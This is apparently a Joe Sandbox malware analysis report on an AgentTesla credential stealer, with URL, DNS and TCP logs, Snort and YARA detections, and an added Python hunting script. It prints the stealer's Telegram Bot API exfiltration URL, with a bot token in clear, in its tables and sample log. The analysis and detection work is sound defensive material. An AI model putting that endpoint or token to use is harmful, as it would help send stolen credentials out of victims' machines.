            http://www.tiro.comw | 0% | Avira URL Cloud | safe |
            http://www.sajatypeworks.comq | 0% | Avira URL Cloud | safe |
            http://www.galapagosdesign.com/staff/dennis.htmR | 0% | Avira URL Cloud | safe |
            http://www.galapagosdesign.com/staff/dennis.htmR | 0% | Virustotal | | Browse
            NameIPActiveMaliciousAntivirus DetectionReputation
            api4.ipify.org
            64.185.227.155
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                api.ipify.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentfalse
                      high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.monotype.U | g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.comiv | g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com2 | g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersB | g0PWOnCNZH.exe, 00000000.00000003.263731883.0000000005D55000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.tiro.com | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | g0PWOnCNZH.exe, 00000000.00000003.270701555.0000000005D50000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.coml1 | g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnD | g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://fontfabrik.com | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org4 | RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comgrito | g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com( | g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.zhongyicts.com.cn | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htmR | g0PWOnCNZH.exe, 00000000.00000003.261346015.0000000005D55000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.comw | g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.comq | g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.comTF | g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.comTC | g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/ | RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.carterandcone.coml | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.monotype. | g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.como | g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | RegSvcs.exe, 00000001.00000002.524290015.0000000002921000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
64.185.227.155 | api4.ipify.org | United States | 18450 | WEBNXUS | false
                                                      Joe Sandbox Version:37.0.0 Beryl
                                                      Analysis ID:830729
                                                      Start date and time:2023-03-20 16:40:05 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 30s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample file name:g0PWOnCNZH.exe
                                                      Original Sample Name:87be1ac6122ed0c75b3af80696b9e686.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
16:41:07 | API Interceptor | 1x Sleep call for process: g0PWOnCNZH.exe modified
                                                      Process:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      File type:
                                                      Entropy (8bit):7.86252276593653
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:g0PWOnCNZH.exe
                                                      File size:746496
                                                      MD5:87be1ac6122ed0c75b3af80696b9e686
                                                      SHA1:28954d7b81380a52dc012eb21c4769fe54070a5c
                                                      SHA256:de673c6577604d1036c5df6d67d9f5f9010eeb367a43ec7712b5614f70b725cd
                                                      SHA512:a58b7039d2967f214534f0609e9e2fa16b0ae2520265bac212cfd8a2d3a908276b1ef54bd8536028ddd1614eafd686d9effdd7d7a3472845c668c1cb1bc7f947
                                                      SSDEEP:12288:r9umYMUnFW/Nhb/kpGsc1WgkAhK6KttQM2AW+DYXoRf0D9u1pHG8RTiy4uhyNv6n:r9uUT2wogkAg6K7Q4pMXomwRhhyNv6
                                                      TLSH:76F402782F8A9538F1321BBD85E8264467AEB3B26713D55D18F511CE4B63B034ED0A2F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;..d..............0..N..........fm... ........@.. ....................................@................................
                                                      Icon Hash:209480e66eb84902
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-16:41:25.765012 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 16:41:11.823951960 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:11.824016094 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:11.824614048 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:11.861870050 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:11.861911058 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:13.289160013 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:13.289249897 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:13.293323994 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:13.293349981 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:13.293910980 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:13.336273909 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:13.603498936 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:13.603526115 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:13.702334881 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:13.703789949 CET | 443 | 49684 | 64.185.227.155 | 192.168.2.3
Mar 20, 2023 16:41:13.703888893 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:13.705327988 CET | 49684 | 443 | 192.168.2.3 | 64.185.227.155
Mar 20, 2023 16:41:25.648309946 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.648375988 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.648475885 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.649236917 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.649266005 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.715833902 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.715944052 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.718837976 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.718869925 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.719206095 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.721429110 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.721477032 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.762315035 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.764890909 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.764924049 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.857546091 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.857656956 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.858115911 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.858155012 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Mar 20, 2023 16:41:25.858175039 CET | 443 | 49685 | 149.154.167.220 | 192.168.2.3
Mar 20, 2023 16:41:25.858217001 CET | 49685 | 443 | 192.168.2.3 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 16:41:11.759686947 CET | 58974 | 53 | 192.168.2.3 | 8.8.8.8
Mar 20, 2023 16:41:11.779360056 CET | 53 | 58974 | 8.8.8.8 | 192.168.2.3
Mar 20, 2023 16:41:11.789952040 CET | 63722 | 53 | 192.168.2.3 | 8.8.8.8
Mar 20, 2023 16:41:11.807668924 CET | 53 | 63722 | 8.8.8.8 | 192.168.2.3
Mar 20, 2023 16:41:25.629864931 CET | 65522 | 53 | 192.168.2.3 | 8.8.8.8
Mar 20, 2023 16:41:25.647144079 CET | 53 | 65522 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 16:41:11.759686947 CET | 192.168.2.3 | 8.8.8.8 | 0x745e | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:11.789952040 CET | 192.168.2.3 | 8.8.8.8 | 0xb647 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:25.629864931 CET | 192.168.2.3 | 8.8.8.8 | 0x9cef | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 16:41:11.779360056 CET | 8.8.8.8 | 192.168.2.3 | 0x745e | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 16:41:11.779360056 CET | 8.8.8.8 | 192.168.2.3 | 0x745e | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:11.779360056 CET | 8.8.8.8 | 192.168.2.3 | 0x745e | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:11.779360056 CET | 8.8.8.8 | 192.168.2.3 | 0x745e | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:11.807668924 CET | 8.8.8.8 | 192.168.2.3 | 0xb647 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 16:41:11.807668924 CET | 8.8.8.8 | 192.168.2.3 | 0xb647 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:11.807668924 CET | 8.8.8.8 | 192.168.2.3 | 0xb647 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:11.807668924 CET | 8.8.8.8 | 192.168.2.3 | 0xb647 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:41:25.647144079 CET | 8.8.8.8 | 192.168.2.3 | 0x9cef | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
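The network tables above show the whole AgentTesla exfil sequence in two steps: RegSvcs.exe resolves api.ipify.org (CNAME api4.ipify.org) to learn the victim's public IP, then fourteen seconds later resolves api.telegram.org and sends the harvested data to https://api.telegram.org/bot<id>:<secret>/sendDocument, which is what the Snort rule 2851779 fires on. The bot id and secret sit in the URL path in clear text, so proxy and DNS telemetry can carry the same detection without the Snort rule. The following is an added example and not part of the Joe Sandbox report: it runs over a constructed, minimal log format (ISO timestamp, host, process, record type, value, an assumption, since real proxy exports differ), extracts the bot id from any Telegram Bot API URL, redacts the secret so the alert is not itself a usable token, and raises severity when the same host performed a public-IP lookup shortly before. The domains, process name, timestamps and bot URL in the sample come from this report; the hostnames, the Telegram.exe line and the getUpdates bot token are made up.

```python
"""Hunt for the AgentTesla exfil sequence observed in this report (public-IP
lookup via ipify, then a Telegram Bot API sendDocument) in proxy/DNS logs.

Added example, not part of the Joe Sandbox report. The log line format is a
constructed minimal one; real proxy/DNS exports will need their own parser.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Telegram Bot API URLs carry the bot token in the path:
#   https://api.telegram.org/bot<bot_id>:<secret>/<method>
# The bot id is numeric and stable per bot; the secret is ~35 url-safe chars.
TELEGRAM_BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>\w+)"
)
# Methods that push data off the host (getUpdates and friends would be C2 polling).
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}
# Public-IP services stealers query before exfil to tag the victim record.
IP_CHECK_DOMAINS = {"api.ipify.org", "api4.ipify.org", "ip-api.com", "checkip.dyndns.org"}


@dataclass
class Event:
    ts: datetime
    host: str
    process: str
    target: str  # DNS query name or full URL


def parse_line(line):
    """Constructed format: '<ISO timestamp> <host> <process> <dns|url> <value>'."""
    ts, host, process, _kind, value = line.split(maxsplit=4)
    return Event(datetime.fromisoformat(ts), host, process, value)


def redact(url):
    """Keep the bot id (a useful indicator), drop the secret so the alert text is not a working token."""
    return TELEGRAM_BOT_URL.sub(
        lambda m: f"https://api.telegram.org/bot{m['bot_id']}:<redacted>/{m['method']}", url
    )


def hunt(lines, window=timedelta(minutes=5)):
    """One alert per Telegram Bot API URL seen, scored by method and by a preceding IP check from the same host."""
    events = [parse_line(l) for l in lines if l.strip()]
    alerts = []
    for e in events:
        m = TELEGRAM_BOT_URL.search(e.target)
        if not m:
            continue
        preceded_by_ip_check = any(
            p.host == e.host
            and e.ts - window <= p.ts <= e.ts
            and any(d in p.target for d in IP_CHECK_DOMAINS)
            for p in events
        )
        is_exfil = m["method"] in EXFIL_METHODS
        if is_exfil and preceded_by_ip_check:
            severity = "high"
        elif is_exfil:
            severity = "medium"
        else:
            severity = "low"  # a bot token in proxy logs is still worth a look
        alerts.append({
            "host": e.host, "process": e.process, "bot_id": m["bot_id"],
            "method": m["method"], "url": redact(e.target),
            "preceded_by_ip_check": preceded_by_ip_check, "severity": severity,
        })
    return alerts


# Constructed sample log. Timestamps, process name, domains and the bot URL follow
# this report's network timeline; hostnames and the last two lines are made up.
SAMPLE_LOG = """\
2023-03-20T16:41:11 WS01 RegSvcs.exe dns api.ipify.org
2023-03-20T16:41:13 WS01 RegSvcs.exe url https://api.ipify.org/
2023-03-20T16:41:25 WS01 RegSvcs.exe dns api.telegram.org
2023-03-20T16:41:25 WS01 RegSvcs.exe url https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument
2023-03-20T16:50:00 WS02 Telegram.exe url https://api.telegram.org/
2023-03-20T17:02:00 WS03 python.exe url https://api.telegram.org/bot111111111:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/getUpdates
"""

if __name__ == "__main__":
    for a in hunt(SAMPLE_LOG.splitlines()):
        print(a["severity"], a["host"], a["process"], a["url"], a["preceded_by_ip_check"])
```

The plain https://api.telegram.org/ hit from the desktop client is not alerted at all, because only URLs with a bot token in the path match; a token seen with getUpdates is reported at low severity since that is the polling side of a Telegram-based C2 rather than exfil. Blocking api.telegram.org outright at the proxy is the cheaper control where the client is not in business use.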
                                                      • api.ipify.org
                                                      • api.telegram.org


                                                      Target ID:0
                                                      Start time:16:41:00
                                                      Start date:20/03/2023
                                                      Path:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                      Imagebase:0x990000
                                                      File size:746496 bytes
                                                      MD5 hash:87BE1AC6122ED0C75B3AF80696B9E686
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:low

                                                      Target ID:1
                                                      Start time:16:41:09
                                                      Start date:20/03/2023
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Imagebase:0x570000
                                                      File size:45152 bytes
                                                      MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      No disassembly